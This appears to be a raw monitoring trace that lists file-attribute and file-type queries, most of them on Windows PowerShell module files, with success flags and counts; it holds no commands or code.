Get Info c:\windows\system32\windowspowershell\v1.0\Modules\BitsTransfer type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\BranchCache type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\BranchCache\BranchCache.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\CimCmdlets type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\CimCmdlets\CimCmdlets.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Defender type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Defender\Defender.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\DirectAccessClientComponents type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Dism type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Dism\Dism.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\DnsClient type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\DnsClient\DnsClient.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\EventTracingManagement type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\EventTracingManagement\EventTracingManagement.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\International type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\International\International.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\iSCSI type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\iSCSI\iSCSI.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\ISE type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\ISE\ISE.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Kds type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Kds\Kds.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.psd1 type = file_attributes False 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.psm1 type = file_attributes False 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.cdxml type = file_attributes False 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.xaml type = file_attributes False 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.dll type = file_attributes False 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\Microsoft.PowerShell.Archive.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Diagnostics type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Diagnostics\Microsoft.PowerShell.Diagnostics.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Host type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Host\Microsoft.PowerShell.Host.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.psd1 type = file_attributes False 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.psm1 type = file_attributes False 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.cdxml type = file_attributes False 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.xaml type = file_attributes False 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.dll type = file_attributes False 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtils.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Security type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 type = file_attributes True 2
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.WSMan.Management\Microsoft.WSMan.Management.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\NetAdapter type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\NetAdapter\NetAdapter.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\NetConnection type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\NetConnection\NetConnection.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\NetEventPacketCapture type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\NetLbfo\NetLbfo.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\PSScheduledJob type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\PSScheduledJob\PSScheduledJob.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\PSWorkflow type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\PSWorkflow\PSWorkflow.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\PSWorkflowUtility type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\PSWorkflowUtility\PSWorkflowUtility.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\ScheduledTasks type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\ScheduledTasks\ScheduledTasks.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\SecureBoot type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\SecureBoot\SecureBoot.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\SmbShare type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\SmbShare\SmbShare.psd1 type = file_attributes True 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 type = file_type True 2
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psd1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psm1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.cdxml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.xaml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5 type = file_attributes True 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.psd1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.psm1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.cdxml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.xaml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester type = file_attributes True 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 type = file_attributes True 2
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 type = file_type True 2
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.psd1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.psm1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.cdxml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.xaml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1 type = file_attributes True 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\1.0.0.1.psd1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\1.0.0.1.psm1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\1.0.0.1.cdxml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\1.0.0.1.xaml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\1.0.0.1.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet type = file_attributes True 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1 type = file_attributes True 2
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1 type = file_type True 2
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psd1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psm1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.cdxml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.xaml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en type = file_attributes True 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en\en.psd1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en\en.psm1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en\en.cdxml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en\en.xaml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en\en.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1 type = file_attributes True 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\1.1.psd1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\1.1.psm1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\1.1.cdxml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\1.1.xaml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\1.1.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline type = file_attributes True 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1 type = file_attributes True 2
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1 type = file_type True 2
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.psd1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.psm1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.cdxml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.xaml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Modules.psd1 type = file_attributes False 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\ type = file_attributes True 3
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex type = file_type True 4
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config type = file_attributes True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config type = file_type True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config type = size, size_out = 0 True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psm1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 type = file_attributes True 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 type = file_attributes True 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psm1 type = file_attributes True 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1 type = file_attributes True 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadLine.psm1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtilsHelper.ps1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtils.psm1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtils.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Host\Microsoft.PowerShell.Host.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Diagnostics\Microsoft.PowerShell.Diagnostics.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive\Microsoft.PowerShell.Archive.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppLocker\AppLocker.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Appx\Appx.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AssignedAccess\AssignedAccess.psm1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AssignedAccess\AssignedAccess.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psm1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BranchCache\BranchCache.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\CimCmdlets\CimCmdlets.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender\Defender.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Dism\Dism.psm1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Dism\Dism.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DnsClient\DnsClient.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\EventTracingManagement\EventTracingManagement.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\International\International.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\iSCSI\iSCSI.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Kds\Kds.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.WSMan.Management\Microsoft.WSMan.Management.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\MMAgent\MMAgent.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\MsDtc\MsDtc.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetAdapter\NetAdapter.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetConnection\NetConnection.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetEventPacketCapture\NetEventPacketCapture.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetLbfo\NetLbfo.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetNat\NetNat.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetQos\NetQos.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetSecurity\NetSecurity.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetSwitchTeam\NetSwitchTeam.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetTCPIP\NetTCPIP.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkConnectivityStatus\NetworkConnectivityStatus.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkSwitchManager\NetworkSwitchManager.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkTransition\NetworkTransition.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PcsvDevice\PcsvDevice.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PKI\PKI.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PnpDevice\PnpDevice.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PrintManagement\PrintManagement.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\PSDesiredStateConfiguration.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDiagnostics\PSDiagnostics.psm1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDiagnostics\PSDiagnostics.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSScheduledJob\PSScheduledJob.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflow\PSWorkflow.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\PSWorkflowUtility.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ScheduledTasks\ScheduledTasks.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SecureBoot\SecureBoot.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbWitness\SmbWitness.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\StartLayout\StartLayout.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Storage\Storage.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\TLS\TLS.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\TroubleshootingPack\TroubleshootingPack.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\TrustedPlatformModule\TrustedPlatformModule.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\VpnClient\VpnClient.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Wdac\Wdac.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\WindowsDeveloperLicense\WindowsDeveloperLicense.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\WindowsErrorReporting.psm1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\WindowsErrorReporting.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\WindowsSearch\WindowsSearch.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\WindowsUpdate\WindowsUpdate.psd1 type = file_attributes True 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1 type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733 type = file_type True 2
Fn
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 type = file_attributes True 5
Fn
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 type = file_type True 2
Fn
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 type = file_type True 2
Fn
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\en-US\Microsoft.PowerShell.Utility.psd1 type = file_attributes False 1
Fn
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\en\Microsoft.PowerShell.Utility.psd1 type = file_attributes False 1
Fn
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\PSGetModuleInfo.xml type = file_attributes False 1
Fn
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll type = file_attributes False 1
Fn
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll\Microsoft.PowerShell.Commands.Utility.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll type = file_attributes False 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utility type = file_attributes False 1
Fn
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 type = file_attributes True 5
Fn
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 type = file_type True 4
Fn
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 type = file_type True 2
Fn
Get Info STD_ERROR_HANDLE type = file_type True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe type = file_type True 2
Fn
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\en-US\Microsoft.PowerShell.Management.psd1 type = file_attributes False 1
Fn
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\en\Microsoft.PowerShell.Management.psd1 type = file_attributes False 1
Fn
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\PSGetModuleInfo.xml type = file_attributes False 1
Fn
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll type = file_attributes False 1
Fn
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll\Microsoft.PowerShell.Commands.Management.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Management type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Management\Microsoft.PowerShell.Commands.Management.dll type = file_attributes False 1
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Management type = file_attributes False 1
Fn
